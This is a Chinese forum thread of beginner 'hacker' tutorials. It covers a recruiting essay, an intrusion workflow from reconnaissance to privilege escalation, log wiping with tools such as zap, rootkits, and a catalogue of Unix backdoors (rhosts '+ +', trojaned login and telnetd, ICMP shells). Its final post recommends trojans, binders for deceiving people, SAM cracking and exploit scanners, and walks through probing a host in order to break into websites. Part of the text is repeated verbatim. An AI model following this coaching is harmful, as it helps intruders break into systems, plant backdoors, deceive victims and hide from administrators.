菜鳥初學教程

一個***的基本技能
1、***的精神態度是很重要的,但技術則更是重要。***的態度雖然是無可取代,隨著新科技的發明和舊技術的取代,這些工具隨時間在慢慢的改變。例如:以往總是會學會用機器碼寫程序,直到最近我們開始使用HTML。不過,在1996年末,當然,這是基礎的hacking技能。在1997年,理所當然的,你必須學會C。 但,如果你只是學一種語言,那麼你不能算是一位***,了不起只能算是一個programmer。除此,你還必須學會學會以獨立於任何程序語言之上的概括性觀念來思考一件程序設計上的問題。要成爲一位真正的***,你必須要能在幾天之內將manual內容和你目前己經知道的關連起學會一種新的語言。也就是說,你必會學還了C之外的東西,你至少還要會LISP或Perl(Java也正在努力的擠上這個名單; 譯者注: 我很懷疑這份名單)。除了幾個重要的hacking常用語言之外,這些語言提供你一些不同的程序設計途徑,並且讓你在好的方法中學習。
程序設計是一種複雜的技術,我沒辨法在這提供完整的學習步驟。但是我能告訴你一些在書本上和課堂上所沒有的東西(有很多,幾乎全部最好的***們都是自習而來的)。(a) 讀別人的程序碼;(寫程序,這兩項是不錯的方法。學習寫程序就像在學習寫一種良好的自然語言,最好的方法是去看一些專家們所寫的東西,然後寫一些你自己的東西,然後讀更多,再寫更多。然後一直持續,一直到你發展出一種屬於自己的風格和特色。要找到好的程序碼來看是很一件很困難的事,因爲,對菜鳥***們而言,適於供他們閱讀和努力的大型程序的source數量很少。但這事己有了戲劇性的變化了; 現在免費的供應的軟件、程序設計工具和操作系統(大都公開提供 source,而且全都是由***們寫成的)到處可看。進入下一個主題。
2、取得一個免費的 UNIX,並學習使用和維護。我先假設你己經有一部個人電腦或者是可以使用任何一部(現在的小孩子真幸福,可如此輕易的擁有 :-))。 取得***技巧的第一個步驟是取得一份Linux 或者一份免費的 BSD-Unix,並將它安裝在自己的機器,並使之順利的運作。沒錯,在這個世界上除了Unix之外,還有其它的操作系統。但是他們只提供bianry,你不能看到他們的程序碼,你也不能修改他們。想要在DOS或Windows或MacOS開始hacking,無疑就是要你綁著枷鎖跳舞一樣。
除此之外,Unix是Internet上的操作系統。當你在不懂Unix的情況下學習使用Internet時,你沒辨法在不懂Unix的情況下成爲Internet的***。因爲這個原故,現在的***文化還是很牢固的以Unix爲中心。(這並不完全是正確的,而且有些活在舊時代的***甚至也不喜歡這種情形,但是Unix和Internet之間的共生共成己經到了牢不可破的地步,即使是Microsoft的大塊肌肉也沒能在上面留下明顯的傷痕。) 因些,把Unix裝起來吧! (我自己是喜歡Linux,但是還有其它的東東可用。) 學習它,讓它運作起來,讓它陪你努力精進。 用他向整個Internet喊話。看程序碼,改程序。
有一天你成爲一位高竿的***,你回頭往後看時會發現,你得到比Microsoft操作系統所能提供的還要好的程序設計工具(包括 C,Lisp和 Perl)。而且得到快樂,並學到比共生共成己經到了牢不可破的地步,即使是Microsoft的大塊肌肉也沒能在上面留下明顯的傷痕。) 因些,把Unix裝起來吧! (我自己是喜歡Linux,但是還有其它的東東可用。) 學習它,讓它運作起來,讓它陪你努力精進。用他向整個Internet喊話。 看程序碼,改程序。有一天你成爲一位高竿的***,你回頭往後看時會發現,你得到比Microsoft操作系統所能提供的還要好的程序設計工具(包括 C,Lisp和 Perl)。而且得到快樂,並
學到比你想像中的還要多的知識。關於學習Unix,在Loginataka有更多的資料。(http://www.ccil.org/~esr/faqs/loginataka。)
看一下Linux distribution的目錄或 Linux CD,並把自己交付給它。
3、學習使用World Wide Web並學會寫 HTML。
在***文化創造出來的東西,大多在他們的活動範圍外被使用著,如,在工廠和辨公室或大學被漠漠的使用著。但Web是一個很大的例外,這個***眼中的大玩具甚至還被政客們接受,並巧巧的在改變這個世界。因此(還有很多好的理由),你必須學習Web。並不只是學習使用browser(這太容易了)而己,還要學會寫HTML這個Web的標籤語言。如果你不知道如何設計程序,寫HTML也可以給一些習慣上的幫助。嗯!! 建立home page吧! 不過,有一個home page 並沒任何特別之處能讓你成爲一位***。Web上到處都是home page,而且大部份都沒什麼重點,沒什麼內容的爛泥 -- 很好看的爛泥巴,但是看起來都一樣,差不多。
4、至少學會以下的其中兩種:
一、網站服務器程序ASP、PHP、CGI、jsP
我個人認爲CGI是最難學的其中一種。
二、程序語言:C語言、C++、VB、JAVA、PERL、DELPHI、彙編語言
不過我認爲C語言的通用性最好,可以跨平臺(操作系統)使用。
還要試着自己寫程序、開發軟件等工作。
三、數據庫管理軟件:MYSQL、SQL、FOXPRO……等。
四、幾種常用的操作系統:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能學到UNIX那是最好不過的了。最最基本的WIN2K、WINNT也要學會吧。
如果以上的你都會了,那麼你已經是個高手了。
 
二樓
***初級技術講解(上)
網絡安全從其本質上來講就是網絡上的信息安全。從廣義來說,凡是涉及到網絡上信息的保密性、完整性、可用性、真實性和可控性的相關技術和理論都是網絡安全的研究領域。確保網絡系統的信息安全是網絡安全的目標,信息安全包括兩個方面:信息的存 儲安全和信息的傳輸安全。信息的存儲安全是指信息在靜態存放狀態下的安全,如是否會被非授權調用等。信息的傳輸安全是指信息在動態傳輸過程中安全。爲了確保網絡信息的傳輸安全,有以下幾個問題:
  (1)對網絡上信息的監聽
  (2)對用戶身份的仿冒
  (3)對網絡上信息的篡改
  (4)對發出的信息予以否認
  (5)對信息進行重發
  對於一般的常用***方法主要有
  1.口令***
  所謂口令***,就是指用一些軟件解開已經得到但被人加密的口令文檔,不過許多***已大量採用一種可以繞開或屏蔽口令保護的程序來完成這項工作。對於那些可以解開或屏蔽口令保護的程序通常被稱爲“Crack”。由於這些軟件的廣爲流傳,使得***電腦網絡系統有時變得相當簡單,一般不需要很深入瞭解系統的內部結構,是初學者的好方法。
  2.特洛伊***術
  說到特洛伊***,只要知道這個故事的人就不難理解,它最典型的做法可能就是把一個能幫助***完成某一特定動作的程序依附在某一合法用戶的正常程序中,這時合法用戶的程序代碼已被該變。一旦用戶觸發該程序,那麼依附在內的***指令代碼同時被激活,這些代碼往往能完成***指定的任務。由於這種***法需要***有很好的編程經驗,且要更改代碼、要一定的權限,所以較難掌握。但正因爲它的複雜性,一般的系統管理員很難發現。
  3.監聽法
  這是一個很實用但風險也很大的******方法,但還是有很多***系統的***採用此類方法,正所謂藝高人膽大。
  網絡節點或工作站之間的交流是通過信息流的轉送得以實現,而當在一個沒有集線器的網絡中,數據的傳輸並沒有指明特定的方向,這時每一個網絡節點或工作站都是一個接口。這就好比某一節點說:“嗨!你們中有誰是我要發信息的工作站。”
  此時,所有的系統接口都收到了這個信息,一旦某個工作站說:“嗨!那是我,請把數據傳過來。”聯接就馬上完成。
  目前有網絡上流傳着很多嗅探軟件,利用這些軟件就可以很簡單的監聽到數據,甚至就包含口令文件,有的服務在傳輸文件中直接使用明文傳輸,這也是非常危險的
4.E-mail技術
  使用email加***程序這是***經常使用的一種手段,而且非常奏效,一般的用戶,甚至是網管,對網絡安全的意識太過於淡薄,這就給很多***以可乘之機。
  5.病毒技術
  作爲一個***,如此使用應該是一件可恥的事情,不過大家可以學習,畢竟也是一種***的辦法,特殊時間,特殊地點完全可以使用。
  6.隱藏技術
  網絡***的一般步驟及實例
  ***的準備階段
  首先需要說明的是,***者的來源有兩種,一種是內部人員利用自己的工作機會和權限來獲取不應該獲取的權限而進行的***。另一種是外部人員***,包括遠程***、網絡節點接入***等。本節主要討論遠程***。
  進行網絡***是一件系統性很強的工作,其主要工作流程是:收集情報,遠程***,遠程登錄,取得普通用戶的權限,取得超級用戶的權限,留下後門,清除日誌。主要內容包括目標分析,文檔獲取,破解密碼,日誌清除等技術,下面分別介紹。
  1.確定***的目的
  ***者在進行一次完整的***之前首先要確定***要達到什麼樣的目的,即給對方造成什麼樣的後果。常見的***目的有破壞型和***型兩種。破壞型***指的只是破壞***目標,使其不能正常工作,而不能隨意控制目標的系統的運行。要達到破壞型***的目的,主要的手段是拒絕服務***(Denial Of Service)。另一類常見的***目的是******目標,這種***是要獲得一定的權限來達到控制***目標的目的。應該說這種***比破壞型***更爲普遍,威脅性也更大。因爲***一旦獲取***目標的管理員權限就可以對此服務器做任意動作,包括破壞性的***。此類***一般也是利用服務器操作系統、應用軟件或者網絡協議存在的漏洞進行的。當然還有另一種造成此種***的原因就是密碼泄露,***者靠猜測或者窮舉法來得到服務器用戶的密碼,然後就可以用和真正的管理員一樣對服務器進行訪問。
  2.信息收集
  除了確定***目的之外,***前的最主要工作就是收集儘量多的關於***目標的信息。這些信息主要包括目標的操作系統類型及版本,目標提供哪些服務,各服務器程序的類型與版本以及相關的社會信息。
  要***一臺機器,首先要確定它上面正在運行的操作系統是什麼,因爲對於不同類型的操作系統,其上的系統漏洞有很大區別,所以***的方法也完全不同,甚至同一種操作系統的不同版本的系統漏洞也是不一樣的。要確定一臺服務器的操作系統一般是靠經驗,有些服務器的某些服務顯示信息會泄露其操作系統。例如當我們通過TELNET連上一臺機器時,如果顯示
  Unix(r)System V Release 4.0
  login:
  那麼根據經驗就可以確定這個機器上運行的操作系統爲SUN OS 5.5或5.5.l。但這樣確定操作系統類型是不準確的,因爲有些網站管理員爲了迷惑***者會故意更改顯示信息,造成假象。
還有一種不是很有效的方法,諸如查詢DNS的主機信息(不是很可靠)來看登記域名時的申請機器類型和操作系統類型,或者使用社會工程學的方法來獲得,以及利用某些主機開放的SNMP的公共組來查詢。
  另外一種相對比較準確的方法是利用網絡操作系統裏的TCP/IP堆棧作爲特殊的“指紋”來確定系統的真正身份。因爲不同的操作系統在網絡底層協議的各種實現細節上略有不同。可以通過遠程向目標發送特殊的包,然後通過返回的包來確定操作系統類型。例如通過向目標機發送一個FIN的包(或者是任何沒有ACK或SYN標記的包)到目標主機的一個開放的端口然後等待迴應。許多系統如windows、 BSDI、 CISCO、 HP/UX和 IRIX會返回一個RESET。通過發送一個SYN包,它含有沒有定義的TCP標記的TCP頭。那麼在Linux系統的迴應包就會包含這個沒有定義的標記,而在一些別的系統則會在收到SYN+BOGU包之後關閉連接。或是利用尋找初始化序列長度模板與特定的操作系統相匹配的方法。利用它可以對許多系統分類,如較早的Unix系統是64K長度,一些新的Unix系統的長度則是隨機增長。還有就是檢查返回包裏包含的窗口長度,這項技術根據各個操作系統的不同的初始化窗口大小來唯一確定它們。利用這種技術實現的工具很多,比較著名的有NMAP、CHECKOS、QUESO等。
  獲知目標提供哪些服務及各服務daemon的類型、版本同樣非常重要,因爲已知的漏洞一般都是對某一服務的。這裏說的提供服務就是指通常我們提到的喘口,例如一般TELNET在23端口,FTP在對21端口,WWW在80端口或8080端口,這只是一般情況,網站管理完全可以按自己的意願修改服務所監聽的端口號。在不同服務器上提供同一種服務的軟件也可以是不同,我們管這種軟件叫做daemon,例如同樣是提供FTP服務,可以使用wuftp、proftp,ncftp等許多不同種類的daemon。確定daemon的類型版本也有助於***利用系統漏洞攻破網站。
  另外需要獲得的關於系統的信息就是一些與計算機本身沒有關係的社會信息,例如網站所屬公司的名稱、規模,網絡管理員的生活習慣、電話號碼等。這些信息看起來與***一個網站沒有關係,實際上很多***都是利用了這類信息攻破網站的。例如有些網站管理員用自己的電話號碼做系統密碼,如果掌握了該電話號碼,就等於掌握了管理員權限進行信息收集可以用手工進行,也可以利用工具來完成,完成信息收集的工具叫做掃描器。用掃描器收集信息的優點是速度快,可以一次對多個目標進行掃描。
  ***的實施階段
  1.獲得權限
  當收集到足夠的信息之後,***者就要開始實施***行動了。作爲破壞性***,只需利用工具發動***即可。而作爲***性***,往往要利用收集到的信息,找到其系統漏洞,然後利用該漏洞獲取一定的權限。有時獲得了一般用戶的權限就足以達到修改主頁等目的了,但作爲一次完整的***是要獲得系統最高權限的,這不僅是爲了達到一定的目的,更重要的是證明***者的能力,這也符合***的追求。
  能夠被***者所利用的漏洞不僅包括系統軟件設計上的安全漏洞,也包括由於管理配置不當而造成的漏洞。前不久,因特網上應用最普及的著名www服務器提供商Apache的主頁被***攻破,其主頁面上的 Powered by Apache圖樣(羽毛狀的圖畫)被改成了Powered by Microsoft Backoffice的圖樣,那個***者就是利用了管理員對Webserver用數據庫的一些不當配置而成功取得最高權限的。

三樓
***初級技術講解(中)
  當然大多數***成功的範例還是利用了系統軟件本身的漏洞。造成軟件漏洞的主要原因在於編制該軟件的程序員缺乏安全意識。當***者對軟件進行非正常的調用請求時造成緩衝區溢出或者對文件的非法訪問。其中利用緩衝區溢出進行的***最爲普遍,據統計80%以上成功的***都是利用了緩衝區溢出漏洞來獲得非法權限的。關於緩衝區溢出在後面用專門章節來作詳細解釋。
  無論作爲一個***還是一個網絡管理員,都需要掌握儘量多的系統漏洞。***需要用它來完成***,而管理員需要根據不同的漏洞來進行不同的防禦措施。瞭解最新最多的漏洞信息,可以到諸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等網站去查找。
  2.權限的擴大
  系統漏洞分爲遠程漏洞和本地漏洞兩種,遠程漏洞是指***可以在別的機器上直接利用該漏洞進行***並獲取一定的權限。這種漏洞的威脅性相當大,***的***一般都是從遠程漏洞開始的。但是利用遠程漏洞獲取的不一定是最高權限,而往往只是一個普通用戶的權限,這樣常常沒有辦法做***們想要做的事。這時就需要配合本地漏洞來把獲得的權限進行擴大,常常是擴大至系統的管理員權限。
只有獲得了最高的管理員權限之後,纔可以做諸如網絡監聽、打掃痕跡之類的事情。要完成權限的擴大,不但可以利用已獲得的權限在系統上執行利用本地漏洞的程序,還可以放一些***之類的欺騙程序來套取管理員密碼,這種***是放在本地套取最高權限用的,而不能進行遠程控制。例如一個***已經在一臺機器上獲得了一個普通用戶的賬號和登錄權限,那麼他就可以在這臺機器上放置一個假的su程序。一旦***放置了假su程序,當真正的合法用戶登錄時,運行了su,並輸入了密碼,這時root密碼就會被記錄下來,下次***再登錄時就可以使用su變成root了。
  ***的善後工作
  1.日誌系統簡介
  如果***者完成***後就立刻離開系統而不做任何善後工作,那麼他的行蹤將很快被系統管理員發現,因爲所有的網絡操作系統一般都提供日誌記錄功能,會把系統上發生的動作記錄下來。所以,爲了自身的隱蔽性,***一般都會抹掉自己在日誌中留下的痕跡。想要了解***抹掉痕跡的方法,首先要了解常見的操作系統的日誌結構以及工作方式。Unix的日誌文件通常放在下面這幾個位置,根據操作系統的不同略有變化
  /usr/adm——早期版本的Unix。
  /Var/adm新一點的版本使用這個位置。
  /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用這個位置。
  /etc,大多數Unix版本把Utmp放在此處,一些Unix版本也把Wtmp放在這裏,這也是Syslog.conf的位置。
  下面的文件可能會根據你所在的目錄不同而不同:
  acct或pacct-一記錄每個用戶使用的命令記錄。
  accesslog主要用來服務器運行了NCSA HTTP服務器,這個記錄文件會記錄有什麼站點連接過你的服務器。
  aculo保存撥出去的Modems記錄。
  lastlog記錄了最近的Login記錄和每個用戶的最初目的地,有時是最後不成功Login的記錄。
  loginlog一記錄一些不正常的L0gin記錄。
  messages——記錄輸出到系統控制檯的記錄,另外的信息由Syslog來生成
  security記錄一些使用 UUCP系統企圖進入限制範圍的事例。
  sulog記錄使用su命令的記錄。
  utmp記錄當前登錄到系統中的所有用戶,這個文件伴隨着用戶進入和離開系統而不斷變化。
  Utmpx,utmp的擴展。
  wtmp記錄用戶登錄和退出事件。
  Syslog最重要的日誌文件,使用syslogd守護程序來獲得。
  2.隱藏蹤跡
  ***者在獲得系統最高管理員權限之後就可以隨意修改系統上的文件了(只對常規 Unix系統而言),包括日誌文件,所以一般***想要隱藏自己的蹤跡的話,就會對日誌進行修改。最簡單的方法當然就是刪除日誌文件了,但這樣做雖然避免了系統管理員根據IP追蹤到自己,但也明確無誤地告訴了管理員,系統己經被人侵了。所以最常用的辦法是隻對日誌文件中有關自己的那一部分做修改。關於修改方法的具體細節根據不同的操作系統有所區別,網絡上有許多此類功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日誌文件中某一用戶的信息,使得當使用w、who、last等命令查看日誌文件時,隱藏掉此用戶的信息。
管理員想要避免日誌系統被***修改,應該採取一定的措施,例如用打印機實時記錄網絡日誌信息。但這樣做也有弊端,***一旦瞭解到你的做法就會不停地向日志裏寫入無用的信息,使得打印機不停地打印日誌,直到所有的紙用光爲止。所以比較好的避免日誌被修改的辦法是把所有日誌文件發送到一臺比較安全的主機上,即使用loghost。即使是這樣也不能完全避免日誌被修改的可能性,因爲***既然能攻入這臺主機,也很可能攻入loghost。
  只修改日誌是不夠的,因爲百密必有一漏,即使自認爲修改了所有的日誌,仍然會留下一些蛛絲馬跡的。例如安裝了某些後門程序,運行後也可能被管理員發現。所以,***高手可以通過替換一些系統程序的方法來進一步隱藏蹤跡。這種用來替換正常系統程序的***程序叫做rootkit,這類程序在一些***網站可以找到,比較常見的有LinuxRootKit,現在已經發展到了5.0版本了。它可以替換系統的ls、ps、netstat、inetd等等一系列重要的系統程序,當替換了ls後,就可以隱藏指定的文件,使得管理員在使用ls命令時無法看到這些文件,從而達到隱藏自己的目的。
  3.後門
   一般***都會在攻入系統後不只一次地進入該系統。爲了下次再進入系統時方便一點,***會留下一個後門,特洛伊***就是後門的最好範例。Unix中留後門的方法有很多種,下面介紹幾種常見的後門,供網絡管理員參考防範。
  <1>密碼破解後門
  這是***者使用的最早也是最老的方法,它不僅可以獲得對Unix機器的訪問,而且可 以通過破解密碼製造後門。這就是破解口令薄弱的帳號。以後即使管理員封了***者的當前帳號,這些新的帳號仍然可能是重新侵入的後門。多數情況下,***者尋找口令薄弱的未使用帳號,然後將口令改的難些。當管理員尋找口令薄弱的帳號是,也不會發現這些密碼已修改的帳號。因而管理員很難確定查封哪個帳號。
  <2>Rhosts + + 後門
  在連網的Unix機器中,象Rsh和Rlogin這樣的服務是基於rhosts文件裏的主機名使用簡 單的認證方法。用戶可以輕易的改變設置而不需口令就能進入。 ***者只要向可以訪問的某用戶的rhosts文件中輸入"+ +",就可以允許任何人從任何地方無須口令便能進 入這個帳號。特別當home目錄通過NFS向外共享時,***者更熱中於此。這些帳號也成 了***者再次侵入的後門。許多人更喜歡使用Rsh,因爲它通常缺少日誌能力. 許多管理員經常檢查 "+ +",所以***者實際上多設置來自網上的另一個帳號的主機名和 用戶名,從而不易被發現。
  <3>校驗和及時間戳後門
  早期,許多***者用自己的trojan程序替代二進制文件。系統管理員便依靠時間戳和系 統校驗和的程序辨別一個二進制文件是否已被改變,如Unix裏的sum程序。***者又發展了使trojan文件和原文件時間戳同步的新技術。它是這樣實現的: 先將系統時鐘撥 回到原文件時間,然後調整trojan文件的時間爲系統時間。一旦二進制trojan文件與 原來的精確同步,就可以把系統時間設回當前時間。Sum程序是基於CRC校驗,很容易 騙過。***者設計出了可以將trojan的校驗和調整到原文件的校驗和的程序。MD5是被 大多數人推薦的,MD5使用的算法目前還沒人能騙過。
四樓
***初級技術講解(下)

  <4>Login後門
  在Unix裏,login程序通常用來對telnet來的用戶進行口令驗證. ***者獲取login.c的 原代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令。如果用戶敲入後門 口令,它將忽視管理員設置的口令讓你長驅直入。這將允許***者進入任何帳號,甚至 是root。由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmp前產生一個訪問 的,所以***者可以登錄獲取shell卻不會暴露該帳號。管理員注意到這種後門後,便 用"strings"命令搜索login程序以尋找文本信息. 許多情況下後門口令會原形畢露。***者就開始加密或者更好的隱藏口令,使strings命令失效<5>Telnetd後門
  當用戶telnet到系統,監聽端口的inetd服務接受連接隨後遞給in.telnetd,由它運行 login.一些***者知道管理員會檢查login是否被修改,就着手修改in.telnetd. 在in.telnetd內部有一些對用戶信息的檢驗,比如用戶使用了何種終端. 典型的終端 設置是Xterm或者VT100.***者可以做這樣的後門,當終端設置爲"letmein"時產生一 個不要任何驗證的shell. ***者已對某些服務作了後門,對來自特定源端口的連接產 生一個shell。
  <6>服務後門
  幾乎所有網絡服務曾被***者作過後門. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本隨處多是。有的只是連接到某個TCP端口的shell,通過後門口令就能獲取訪問。這些程序有時用刺媧□?Ucp這樣不用的服務,或者被加入inetd.conf 作爲一個新的服務,管理員應該非常注意那些服務正在運行,並用MD5對原服務程序做校驗。
  <7>Cronjob後門
  Unix上的Cronjob可以按時間表調度特定程序的運行。***者可以加入後門shell程序 使它在1AM到2AM之間運行,那麼每晚有一個小時可以獲得訪問。也可以查看cronjob中 經常運行的合法程序,同時置入後門。
  <8>庫後門
  幾乎所有的UNIX系統使用共享庫,共享庫用於相同函數的重用而減少代碼長度。一些***者在象crypt.c和_crypt.c這些函數裏作了後門;象login.c這樣的程序調用了 crypt()。當使用後門口令時產生一個shell。 因此,即使管理員用MD5檢查login程序,仍然能產生一個後門函數,而且許多管理員並不會檢查庫是否被做了後門。對於許多***者來說有一個問題: 一些管理員對所有東西多作了MD5校驗,有一種辦法是***者對open()和文件訪問函數做後門。後門函數讀原文件但執行trojan後門程序。所以 當MD5讀這些文件時,校驗和一切正常,但當系統運行時將執行trojan版本的,即使trojan庫本身也可躲過MD5校驗,對於管理員來說有一種方法可以找到後門,就是靜態編連MD5校驗程序然後運行,靜態連接程序不會使用trojan共享庫。
  <9>內核後門
  內核是Unix工作的核心,用於庫躲過MD5校驗的方法同樣適用於內核級別,甚至連靜態 連接多不能識別. 一個後門作的很好的內核是最難被管理員查找的,所幸的是內核的 後門程序還不是隨手可得,每人知道它事實上傳播有多廣。
 <10>文件系統後門
  ***者需要在服務器上存儲他們的掠奪品或數據,並不能被管理員發現,***者的文章常是包括exploit腳本工具,後門集,sniffer日誌,email的備分,原代碼,等等!有時爲了防止管理員發現這麼大的文件,***者需要修補"ls","du","fsck"以隱匿特定的目錄和文件,在很低的級別,***者做這樣的漏洞: 以專有的格式在硬盤上割出一部分,且表示爲壞的扇區。因此***者只能用特別的工具訪問這些隱藏的文件,對於普通的管理員來說,很難發現這些"壞扇區"裏的文件系統,而它又確實存在。
  <11>Boot塊後門
  在PC世界裏,許多病毒藏匿與根區,而殺病毒軟件就是檢查根區是否被改變。Unix下,多數管理員沒有檢查根區的軟件,所以一些***者將一些後門留在根區。
. 所以更多的管理員是 用MD5校驗和檢測這種後門的。
<12>隱匿進程後門
  ***者通常想隱匿他們運行的程序,這樣的程序一般是口令破解程序和監聽程序 (sniffer),有許多辦法可以實現,這裏是較通用的: 編寫程序時修改自己的argv[] 使它看起來象其他進程名。可以將sniffer程序改名類似in.syslog再執行,因此 當管理員用"ps"檢查運行進程時,出現 的是標準服務名。可以修改庫函數致使 "ps"不能顯示所有進程,可以將一個後門或程序嵌入中斷驅動程序使它不會在進程表顯現。使用這個技術的一個後門例子是
  amod.tar.gz :
  http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html網絡通行. 這些網絡通行後 門有時允許***者通過防火牆進行訪問。有許多網絡後門程序允許***者建立某個端 口號並不用通過普通服務就能實現訪問. 因爲這是通過非標準網絡端口的通行,管理 員可能忽視***者的足跡. 這種後門通常使用TCP,UDP和ICMP,但也可能是其他類型報文。
  <14>TCP Shell 後門
  ***者可能在防火牆沒有阻塞的高位TCP端口建立這些TCP Shell後門. 許多情況下,他 們用口令進行保護以免管理員連接上後立即看到是shell訪問. 管理員可以用netstat 命令查看當前的連接狀態,那些端口在偵聽,目前連接的來龍去脈. 通常這些後門可 以讓***者躲過TCP Wrapper技術. 這些後門可以放在SMTP端口,許多防火牆允許 e-mail通行的.
  <15>UDP Shell 後門
  管理員經常注意TCP連接並觀察其怪異情況,而UDP Shell後門沒有這樣的連接,所以 netstat不能顯示***者的訪問痕跡,許多防火牆設置成允許類似DNS的UDP報文的通行,通常***者將UDP Shell放置在這個端口,允許穿越防火牆。
  <16>ICMP Shell 後門
  Ping是通過發送和接受ICMP包檢測機器活動狀態的通用辦法之一。許多防火牆允許外界ping它內部的機器,***者可以放數據入Ping的ICMP包,在ping的機器間形成一個shell通道,管理員也許會注意到Ping包暴風,但除了他查看包內數據,否者***者不會暴露。
  <17>加密連接
  管理員可能建立一個sniffer試圖某個訪問的數據,但當***者給網絡通行後門加密 後,就不可能被判定兩臺機器間的傳輸內容了。

五樓
基礎知識(上)

我認爲這是一套適合初學者由淺到深的文章,所以強烈推薦給大家,作者從基礎講到最近比較火的漏洞,可能有些人看來是淺了些,但是的確很適合想幹點啥但又不知道怎麼辦的菜鳥們 。
第一節,伸展運動。這節操我們要準備道具,俗話說:“工欲善其事,必先利其器”(是這樣嗎?哎!文化低……)說得有道理,我們要學習***技術,一點必要的工具必不可少。
1,一臺屬於自己的可以上網的電腦。這樣你可以有充分的支配權,上網不用說,否則你怎麼看到我的文章?wap?呵呵!屬於自己很重要,否則安全性是個很大的問題。第一點相信大家沒有問題。
2,windows2000/nt,別和我說98/me,他們是你們同學用來玩遊戲的!(當然,我也是鐵桿game fan)對網絡支持極差,命令受限制,很多軟件又不能用,對***來說使用起來絆手絆腳,非常不利。這裏我推薦2000,這是一個很成熟的系統(漏洞還是有一堆)。推薦雙系統,這樣黑玩搭配,幹活不累。
3,冰河。中國第一***,中者數不勝數,國人驕傲。雖然用冰河根本不能算***,但它確實能培養你對***的興趣,同時幫助你瞭解網絡,相信很多***同學都是這樣起步的。靜止寫的那篇冰河教程很不錯,大家仔細看看。而且,以後你學會***服務器後,用冰河操作也會減少工作量(我是懶蟲,爽!)
4,oicq。我們學***,可不是學泡mm!bfctx你………… 息怒息怒!我們當然是學***,但不要忘了,衆人拾柴火更高,我們通過cshu的成員列表,互相聯繫幫助,對提高水平很有幫助!另外我要廢話一句:據我瞭解,現在***網站下載最多的都是針對oicq的破解工具,我個人認爲很無聊,偷個密碼代表什麼,浪費時間!最後補充:mm不能不泡。(誰砸我??!!)
5,superscan。很好用的端口掃描器,速度超快,功能一流,一旦擁有,別無所求……(打住!)不論是找***受害者,還是掃服務器端口,它都非常有效,cshu強烈推薦!
6,一本筆記本/便條,網上資料相當多,***處理的也是非常之多。良好的習慣決定了你的效率,準備一本筆記本,記錄下你的成果,肉雞,***利用,命令,密碼……堅持一下,你會發現你的效率大幅上升的!
7,lc3.著名nt/2000sam破解程序,有時我們拿不到足夠權限,又沒好辦法,那麼lc3是最好的解決辦法,只要你拿的到sam,你就是服務器它爺爺!本站有其破解程序,支持了暴力破解!
8,程序合併。這是玩***必需的,雖然***是很低的手段,但有時配合巧辦法(以後我會介紹)確實能夠達到意想不到的效果,朋友們可以在空閒時玩玩***,很有趣,若你能巧妙的騙過mm,那麼webmaster也可能被你騙倒:〉 (比較理想化)
9,流光4for 2000/nt。可能是世界上最好的綜合類黑軟!中國的驕傲,它集成了很全的漏洞信息,速度快,方法多,對有漏洞的主機是毀滅性的打擊,操作又方便,是快速黑站必不可少的精品工具。超級吐血推薦!!
10,良好的心態,穩定的情緒,刻苦鑽研的精神,刨根問底的作風,打掃房間的習慣。***是門很高深的學問,不要幻想一步登天,失敗是常有的事,千萬不可灰心。在那麼多黑軟的包圍下,切不可完全依賴他們,一定要了解它們利用什麼原理工作。對任何一個小問題,小細節,一定要問清楚,cshu就是給大家互相交流的場所哦!黑完後不要得意忘形,打掃戰場也很重要,以防萬一。
第一節操完,可能很無聊,我就這點水平,大家見諒!這裏我說一句大話:做完菜鳥操,包你會黑簡單的站(哎喲!心慌了!)
下一節操我們要介紹如何掌握一臺主機的基本信息,期待中……
真是太對不起大家了,隔了那麼久才寫這篇教程,我這幾天實在太忙,大家還是體諒一下我吧,好了,開始做操。
今天的內容是獲得主機的信息。 我們要黑一臺主機,首先要了解它的信息,包括它的類型,用戶列表,目錄,端口,漏洞等等。
首先我們我們要找一臺主機來練手,隨便挑吧!www.flyingfish.com(亂說的)
第一部,呵呵,先在ie裏看看吧,mmmm.....做的還行,挺精緻的!主要是我們肯定了它現在是正常的。 然後,我們應該知道它的ip,很簡單,ping它一下就可以了。
ping www.flyingfish.com,看看窗口裏有了什麼?是不是有三行迴應,其中的111.111.222.222就是ip了(還是胡說的,一個例子)。有人是不是要問,我這裏怎麼沒有。那可能是兩個原因,第一,你打錯命令了;第二,該主機裝了防火牆,禁止ping,不過這種可能很小。
知道了ip,下一步應該確定端口了。下面是一些常用的端口的默認值
21--ftp 重要哦
23--telnet 歡呼吧
25-smtp 儘管重要,但似乎沒什麼可利用的
53--domain 同上
79--finger 可知道用戶信息了
80--http 要看網頁,沒它不行吧
110--pop 收信的
139--netbios 共享用的,很有利用價值哦
3389--win2000超級終端 呵呵,這個好!
其實端口有上千種,這些最最常用
我們怎麼知道服務器有什麼端口打開呢??去找個掃描器吧,x-scan ,super scan,flux等等很多哦。這裏我推薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計大家不會有問題,輕輕幾點,打開的端口就出現了。不錯不錯,上面說到的都有(太理想化了吧!)
那麼我們該如何應對呢?
ps:忘了說一聲,順便掃一下7626,冰河有也說不準哦:)
若有ftp,那就用用匿名登陸。自己動手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望
telnet在!好!telnet 111.111.222.222,出現窗口了吧!嗯?要密碼?看來網管還不是超級注意文明用語:)隨便猜個,錯了,閃人!
smtp,看着它,無奈
domain,一般它帶了局域網了
finger 可以知道用戶列表了,不好,忘了用法了,幸好finger很少出現
80肯定在,我們等會來對付它
110 有smtp,pop在也不奇怪了
139 找個掃描器來找找有沒有露在外面的共享吧,日後也用得着
3389 太太太好了!!打開客戶端吧,用輸入法漏洞試試,成了就幹了它!不成也沒事,我們以後完全控制它3389會很方便的。
端口掃完了!我們在多瞭解它一點吧!追捕大家都知道吧,其實用它獲取主機信息也不賴哦。打開追捕,輸入ip,選擇智能追捕,是不是有很多信息出來了?雖然不能直接利用,但畢竟我們有對它有了進一步的瞭解。
掌握了那麼多信息,我們該做點什麼了,一般******都是靠着系統漏洞,不會都傻傻地去暴力破解的。我們現在就要看看它有什麼漏洞。
